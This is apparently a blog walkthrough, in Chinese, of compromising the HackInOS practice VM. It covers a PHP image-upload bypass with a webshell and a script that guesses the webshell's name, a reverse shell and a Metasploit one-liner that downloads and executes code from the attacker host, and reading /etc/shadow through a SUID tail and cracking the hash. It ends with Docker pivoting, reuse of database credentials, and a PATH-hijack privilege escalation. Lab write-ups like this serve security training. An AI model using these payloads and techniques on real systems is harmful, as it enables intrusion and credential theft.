环境搭建
下载HackInOS

使用VirtualBox导入ovf,注意需要使用vbox导入
主机发现
本机ip:
192.168.222.131
ip发现:
arp-scan --interface=eth0 192.168.222.0/24
靶机ip:
192.168.222.132 00:0c:29:9e:3a:be VMware, Inc.
端口探测
nmap -sVC -p- 192.168.222.132
-sV 开放版本探测,可以直接使用-A同时打开操作系统探测和版本探测
-sC 根据端口识别的服务,调用默认脚本
-p- 指定所有端口
发现只开放了22、8000端口
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) 8000/tcp open http Apache httpd 2.4.25 ((Debian)) |
尝试ssh连接
➜ ~ ssh root@192.168.222.132 The authenticity of host '192.168.222.132 (192.168.222.132)' can't be established. ECDSA key fingerprint is SHA256:TW0nX/yND0yHIOROC6P/fnW1FZBF8bZkZUA258XTvD0. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.222.132' (ECDSA) to the list of known hosts. root@192.168.222.132's password: Permission denied, please try again. root@192.168.222.132's password: |
结果说明root用户是存在的,但是目前密码不知,暂时打住,下面从8000端口入手!
突破8000端口
怀疑为web接口
怀疑8000端口是http协议端口,浏览器访问之:如下图
发现这是一个Worldpress的站点,初步静态页面审计没有发现问题,接下来使用wpscan扫描之。
Httrack
httrack可以帮助测试人员将目标网站所有可以访问的页面爬取到本地
httrack -u http://192.168.222.132:8000/
只发现index.html
,基本无用
Wpscan
WPScan
是一个专门扫描 WordPress
漏洞的黑盒子扫描器
目录爆破
wpscan --url http://192.168.199.116:8000/ -e
-e --enumerate 枚举
扫描结果
http://192.168.222.132:8000/robots.txt
|
WordPress version 5.0.3 identified (Insecure, released on 2019-01-09). | Detected By: Emoji Settings (Passive Detection) | - http://192.168.222.132:8000/, Match: 'wp-includes/js/wp-emoji-release.min.js?ver=5.0.3' | Confirmed By: Meta Generator (Passive Detection) | - http://192.168.222.132:8000/, Match: 'WordPress 5.0.3' | | [!] 1 vulnerability identified: | | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS) | Fixed in: 5.04 | References: | - https://wpvulndb.com/vulnerabilities/9230 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787 | - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b | - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/ | - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/ |
发现存在robots.txt,访问之:
User-agent:* Disallow:/upload.php Disallow:/uploads |
Nikto
Nikto
是一款小巧的Web
服务器漏洞探测评估工具
nikto -h 192.168.222.132 -p 8000 -o /root/hackINOS.html
扫描结果
"robots.txt" contains 2 entries which should be manually viewed.
|
扫描结果比worldpress少,发现worldpress用wpscan还是明智之举!
访问upload.php
线索太明显,访问https://github.com/fatihhcelik/Vulnerable-Machine---Hint
发现上传脚本的源码,有源码还不好办??
<div align="center"> <form action="" method="post" enctype="multipart/form-data"> <br> <b>Select image : </b> <input type="file" name="file" id="file" style="border: solid;"> <input type="submit" value="Submit" name="submit"> </form> </div> // Check if image file is a actual image or fake image if(isset($_POST["submit"])) { $rand_number = rand(1,100); $target_dir = "uploads/"; $target_file = $target_dir . md5(basename($_FILES["file"]["name"].$rand_number)); $file_name = $target_dir . basename($_FILES["file"]["name"]); $uploadOk = 1; $imageFileType = strtolower(pathinfo($file_name,PATHINFO_EXTENSION)); $type = $_FILES["file"]["type"]; $check = getimagesize($_FILES["file"]["tmp_name"]); if($check["mime"] == "image/png" || $check["mime"] == "image/gif"){ $uploadOk = 1; }else{ $uploadOk = 0; echo ":)"; } if($uploadOk == 1){ move_uploaded_file($_FILES["file"]["tmp_name"], $target_file.".".$imageFileType); echo "File uploaded /uploads/?"; } } |
源码审计
- 我们可以看到上传的文件保存在/uploads目录中,文件上传之后文件名被拼接上了了
1-100
随机数的md5值!
$target_file = $target_dir . md5(basename($_FILES["file"]["name"].$rand_number));
- 拼接之后,加上了新的文件类型后缀!
move_uploaded_file($_FILES["file"]["tmp_name"], $target_file.".".$imageFileType);
- 文件上传的检测机制仅为mime检测,此处存在绕过的可能,修改上传文件的content-type即可!
- 上传成功输出
"File uploaded /uploads/?"
文件上传漏洞利用
上传马儿
测试文件上传路径:
直接按提交,查看返回数据包
<b>Warning</b>: getimagesize(): Filename cannot be empty in <b>/var/www/html/upload.p
|
可知,uploads文件夹位于/var/www/html/
,此信息在后面会用到,暂且不提!
上传马儿:
我们看到upload.php中不仅对MIMIE类型做了检测,还使用getimagesize
函数对于图片信息做了获取,因此我们必须在马儿中包含有一张png
图片的信息,使用以下命令:
cat 1.png 1.php > 2.php
爆破马名
import sys import hashlib import re for i in range(100): filename = "b374.php" + str(i) md5_name = hashlib.md5(filename.encode()) path = md5_name.hexdigest()+".php" f = open("path.txt","a+") f.write(path+"rn") f.close() |
再搭配gobuster,爆破之,测试过程由于gobuster升级为3.0版本,莫名报错!
干脆使用python一次性解决!
import sys import hashlib import re import requests for i in range(100): filename = "2.php" + str(i) md5_name = hashlib.md5(filename.encode()) path = md5_name.hexdigest()+".php" url = "http://192.168.222.132:8000/uploads/" + path html = requests.head(url) if html.status_code==200: print "Success:" + url break else: continue |
得到马名
http://192.168.222.132:8000/uploads/d3ec45de3befea4f9ada1b01ddcbe0be.php : 200
|
发现上传的马儿过一段时间就会被失效,估计不超过10秒,应该是服务端有定时查杀马儿的定时任务!
因为来不及操作大马,无法反弹shell,下面换个思路,使用kali自带的菜刀工具weevely
连接之
weevely
kali linux中的菜刀,不过只支持php的马儿。
生成小马儿:
➜ script weevely generate shell ./2.php Generated './2.php' with password 'shell' of 772 byte size. ➜ script cat 1.png 2.php > 3.php |
通过BurpSuite上传3.php,并使用脚本再次爆破马儿名!
http://192.168.222.132:8000/uploads/ba266cb299323ddc54648f2976bc5240.php
|
weevely连接之:
weevely http://192.168.222.132:8000/uploads/937ce472973cfefec3886c94e750060b.php shell
|
weevely上传大马儿到网站根目录:/var/www/html
www-data@1afdd1f6b82c:/var/www/html/uploads $ file_upload /mnt/hgfs/ctf_debug/script/1.php /var/www/html/1.php True |
访问大马儿:
反弹shell
kali开启监听:nc -lvp 4444
大马开启Reverse Shell :
获取标准shell
python -c "import pty;pty.spawn ('/bin/bash')"
|
Docker环境探测
查看cgroup
cat /proc/1/cgroup
当其中含有docker等字眼时,该环境可能在docker环境下!
6:devices:/docker/1afdd1f6b82caf7210e675e85deb6a537a2f7839d9fabecd5d57f0e385e6dd3d
|
查看dockerenv
ls -alt /.dockerenv
若存在,表明是在docker环境下!
www-data@1afdd1f6b82c:/var/www/html$ ls -alt /.dockerenv ls -alt /.dockerenv -rwxr-xr-x 1 root root 0 Feb 23 15:12 /.dockerenv |
查看sched
cat /proc/1/sched | head -n 1
www-data@1afdd1f6b82c:/var/www/html$ cat /proc/1/sched | head -n 1 cat /proc/1/sched | head -n 1 apache2 (1, #threads: 1) |
真实环境为:
root@kali:~# cat /proc/1/sched | head -n 1 systemd (1, #threads: 1) |
通过启动进程判断
在一般真实的环境中,linux首先启动的进程是init
,或者systemd
,而在docker环境中则不一定。
真实环境下
root@kali:~# ps -q1 PID TTY TIME CMD 1 ? 00:00:02 systemd
|
通过启动进程判断
在一般真实的环境中,linux首先启动的进程是init
,或者systemd
,而在docker环境中则不一定。
真实环境下
root@kali:~# ps -q1 PID TTY TIME CMD 1 ? 00:00:02 systemdroot@kali:~# |
docker环境下
root@55ff7ae5bdae:~# ps -p1 PID TTY TIME CMD 1 ? 00:00:00 startWebLogic.s |
通过以上方法我们可以确定此apache服务器是一个docker!
通常flag存在于真实系统中,因此我们需要docker逃逸!
Docker权限提升
脚本提权
本次使用LinEnum.sh
提权脚本进行权限提升
使用大马儿将LinEnu上传到靶机,其它上传文件的方式有:
开启临时服务器,在靶机上wget之 大马儿一键上传之 scp之 |
./LinEnu -r report -e /tmp/ -t
查看report
tar cvf report.tar LinEnum-export-18-07-19
得到以下信息:
查看suid权限的文件:
tail居然具有suid权限,岂不是可以读取/etc/shadow下root用户的密码hash!
读取root密码
www-data@1afdd1f6b82c:/$ tail -c1G /etc/shadow tail -c1G /etc/shadow root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7::: |
$6$开头的,表明是用SHA-512加密的 $1$ 表明是用MD5加密的 $2$ 是用Blowfish加密的 $5$ 是用 SHA-256加密的 帐号名称 :www-data 加密后的密码:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/ 上次修改密码的日期:17951 密码不可被变更的天数:0 密码需要被重新变更的天数:99999(99999表示不需要变更) 密码变更前提前几天警告 :7 帐号失效日期 :无 帐号取消日期 :无 保留条目,目前没用 |
john密码破解
echo "$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/" > hash john --show hash 密码:john |
获得root权限
接下来我们将以这个docker为跳板,进行内网渗透的示例:
Meterpreter内网穿透
查看内网网段
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 172.18.0.3 netmask 255.255.0.0 broadcast 172.18.255.255 ether 02:42:ac:12:00:03 txqueuelen 0 (Ethernet) RX packets 9279 bytes 792244 (773.6 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 8578 bytes 6367756 (6.0 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 |
内网网段为:172.18.0.0
ping测试
➜ ~ ping 172.18.0.3 PING 172.18.0.3 (172.18.0.3) 56(84) bytes of data. 64 bytes from 172.18.0.3: icmp_seq=1 ttl=128 time=8.51 ms |
发现kali能够与之ping通,使用nmap扫描一下呗
➜ ~ nmap -PO 172.18.0.0/24 Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-19 09:05 CST Nmap scan report for 172.18.0.1 Host is up (0.041s latency). PORT STATE SERVICE 1/tcp open tcpmux 3/tcp open compressnet 4/tcp open unknown 6/tcp open unknown 7/tcp open echo 9/tcp open discard ... |
结果不敢相信,估计是做了处理,既然nmap不能得到有用信息,下面使用Meterpreter获取跳板。
反弹脚本1
use exploit/multi/script/web_delivery set lport 8888 set lhost 192.168.222.134 run [*] Started reverse TCP handler on 192.168.222.134:8888 [*] Using URL: http://0.0.0.0:8080/i44JcN4PegCve [*] Local IP: http://192.168.222.134:8080/i44JcN4PegCve [*] Server started. [*] Run the following command on the target machine: |
python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.222.134:8080/Xyy19c');exec(r.read());"
|
回连shell
在靶机标准shell中输入上述脚本,即可回连shell。
msf5 exploit(multi/script/web_delivery) > [*] 192.168.222.132 web_delivery - Delivering Payload [*] Sending stage (53755 bytes) to 192.168.222.132 [*] Meterpreter session 1 opened (192.168.222.134:8888 -> 192.168.222.132:37218) at 2019-07-19 09:14:10 +0800 |
查看sessions
msf5 exploit(multi/script/web_delivery) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter python/linux root @ 1afdd1f6b82c 192.168.222.134:8888 -> 192.168.222.132:37820 (172.18.0.3) |
端口扫描1
msf5 exploit(multi/script/web_delivery) > use auxiliary/scanner/portscan/tcp msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.1-254 rhosts => 172.16.0.1-254 msf5 auxiliary(scanner/portscan/tcp) > set thread 50 thread => 8 msf5 auxiliary(scanner/portscan/tcp) > run |
设置路由
msf5 exploit(multi/script/web_delivery) > use post/multi/manage/autoroute msf5 post(multi/manage/autoroute) > set session 3 session => 3 msf5 post(multi/manage/autoroute) > run [!] SESSION may not be compatible with this module. [*] Running module against 1afdd1f6b82c [*] Searching for subnets to autoroute. [*] Unable to get routes from session, trying interface list. [+] Route added to subnet 172.18.0.0/255.255.0.0 from eth0. [*] Post module execution completed |
端口扫描2
msf5 exploit(multi/script/web_delivery) > use auxiliary/scanner/portscan/tcp msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.1-254 rhosts => 172.16.0.1-254 msf5 auxiliary(scanner/portscan/tcp) > set thread 50 thread => 8 msf5 auxiliary(scanner/portscan/tcp) > run |
反弹脚本2
➜ ~ msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.222.134 lport=8855 -f elf -o test [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 129 bytes Final size of elf file: 249 bytes Saved as: test |
回连shell
靶机运行test:
root@1afdd1f6b82c:~# chmod +x test chmod +x test root@1afdd1f6b82c:~# ./test ./test |
Kali添加路由:
msf5 auxiliary(server/socks4a) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/linux uid=0, gid=0, euid=0, egid=0 @ 172.18.0.3 192.168.222.134:8855 -> 192.168.222.132:57122 (172.18.0.3) msf5 auxiliary(server/socks4a) > sessions 1 [*] Starting interaction with 1... meterpreter > run autoroute -s 172.18.0.0/24 [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] [*] Adding a route to 172.18.0.0/255.255.255.0... [+] Added route to 172.18.0.0/255.255.255.0 via 192.168.222.132 [*] Use the -p option to list all active routes meterpreter > run autoroute -p [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 172.18.0.0 255.255.255.0 Session 1 |
扫描测试:
meterpreter > run post/linux/gather/arp_scanner RHOSTS 172.18.0.0/24 无结果 |
Kali开启监听:
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.222.134 lhost => 192.168.222.134 msf5 exploit(multi/handler) > set lport 8855 lport => 8855 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.222.134:8855 [*] Sending stage (3021284 bytes) to 192.168.222.132 [*] Meterpreter session 1 opened (192.168.222.134:8855 -> 192.168.222.132:57122) at 2019-07-20 08:57:33 +0800 meterpreter > background [*] Backgrounding session 1... msf5 exploit(multi/handler) > sessions msf5 exploit(multi/handler) > use auxiliary/server/socks4a msf5 auxiliary(server/socks4a) > set srvhost 192.168.222.134 srvhost => 192.168.222.134 msf5 auxiliary(server/socks4a) > run msf5 auxiliary(server/socks4a) > netstat -antp | grep 1080 [*] exec: netstat -antp | grep 1080 tcp 0 0 192.168.222.134:1080 0.0.0.0:* LISTEN 61468/ruby |
配置proxychains
添加 sock4 192.168.222.134 1080
|
Nmap扫描
➜ ~ nmap -sVC -p- 172.18.0.3 Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 09:14 CST RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 失败 |
Meterpreter添加路由扫描
meterpreter > run autoroute -s 172.18.0.0/24 meterpreter > run autoroute -p meterpreter > background [*] Backgrounding session 1... msf5 auxiliary(server/socks4a) > use post/multi/manage/autoroute msf5 post(multi/manage/autoroute) > set session 1 msf5 post(multi/manage/autoroute) > run msf5 post(multi/manage/autoroute) > use auxiliary/scanner/portscan/tcp msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.1-254 msf5 auxiliary(scanner/portscan/tcp) > set threads 6 msf5 auxiliary(scanner/portscan/tcp) > run [+] 172.18.0.1: - 172.18.0.1:22 - TCP OPEN [+] 172.18.0.3: - 172.18.0.3:80 - TCP OPEN [+] 172.18.0.4: - 172.18.0.4:2021 - TCP OPEN [+] 172.18.0.2: - 172.18.0.2:3306 - TCP OPEN [+] 172.18.0.1: - 172.18.0.1:8000 - TCP OPEN |
横向渗透
连接数据库服务器
root@1afdd1f6b82c:/var/www/html# mysql -h 172.18.0.2 -u wordpress -p mysql -h 172.18.0.2 -u wordpress -p Enter password: wordpress root@1afdd1f6b82c:/var/www/html# mysql -h 172.18.0.2 -u wordpress -p mysql -h 172.18.0.2 -u wordpress -p Enter password: wordpress |
数据库密码在/var/www/html/wp-config.php可以查看之。
获取密钥信息
MySQL [(none)]> use wordpress; MySQL [wordpress]> show tables; show tables; +-----------------------+ | Tables_in_wordpress | +-----------------------+ | host_ssh_cred | +-----------------------+ 13 rows in set (0.01 sec) MySQL [wordpress]> select * from host_ssh_cred; select * from host_ssh_cred; +-------------------+----------------------------------+ | id | pw | +-------------------+----------------------------------+ | hummingbirdscyber | e10adc3949ba59abbe56e057f20f883e | +-------------------+----------------------------------+ 1 row in set (0.00 sec) |
e10adc3949ba59abbe56e057f20f883e
破解得123456
SSH连接
ssh hummingbirdscyber@192.168.222.132
|
hummingbirdscyber@vulnvm:~/Desktop$ id uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker) |
可以发现这是一个普通权限用户!
在桌面发现文件a.out,可能是一个线索,下面使用scp命令复制出来。
SCP
hummingbirdscyber@vulnvm:~/Desktop$ scp a.out root@192.168.222.134:/tmp The authenticity of host '192.168.222.134 (192.168.222.134)' can't be established. ECDSA key fingerprint is SHA256:uyiEFaYb+e/fuFbsWaZI4vD0E+Cj6t8iAucXz4MPzxA. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.222.134' (ECDSA) to the list of known hosts. root@192.168.222.134's password: a.out |
逆向a.out
int __cdecl main(int argc, const char **argv, const char **envp) { setgid(0); setuid(0); system("whoami"); return 0; } |
我们发现a.out会以root权限执行whoami命令,如果可以控制whoami的内容,就可以获取shell了。
直接构造一个whoami.c(靶机已经了gcc)
int main(void) { system("/bin/bash"); return 0 ; } |
whoami提权
通过scp把文件传到靶机:
hummingbirdscyber@vulnvm:/usr/bin$ scp -r root@192.168.222.134:/root/whoami.c /tmp/whoami.c root@192.168.222.134's password: whoami.c |
查看环境变量:
hummingbirdscyber@vulnvm:~$ echo $PATH /home/hummingbirdscyber/bin:/home/hummingbirdscyber/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin |
我们发现
将whoami可执行程序放到hummingbirdscyber/bin/下:
hummingbirdscyber@vulnvm:/tmp$ mv whoami /home/hummingbirdscyber/bin/ hummingbirdscyber@vulnvm:~/bin$ gcc whoami.c -o whoami hummingbirdscyber@vulnvm:~/bin$ ls whoami whoami.c hummingbirdscyber@vulnvm:~/bin$ chmod +x whoami hummingbirdscyber@vulnvm:~/bin$ cd hummingbirdscyber@vulnvm:~$ cd Desktop/ hummingbirdscyber@vulnvm:~/Desktop$ ./a.out root@vulnvm:~/Desktop# ls root@vulnvm:~/Desktop# cd /root root@vulnvm:/root# ls flag |
root@vulnvm:/root# cat flag Congratulations! -ys- /mms. +NMd+` `/so/hMMNy- `+mMMMMMMd/ ./oso/- `/yNMMMMMMMMNo` .` +- .oyhMMMMMMMMMMN/. o. `:+osysyhddhs` `o` .:oyyhshMMMh. .: `-//:. `:sshdh: ` -so:. .yy. :odh +o--d` /+. .d` -/` `y` `:` `/ `. |
原创文章,作者:小嵘源码,如若转载,请注明出处:https://www.lcpttec.com/hackinos/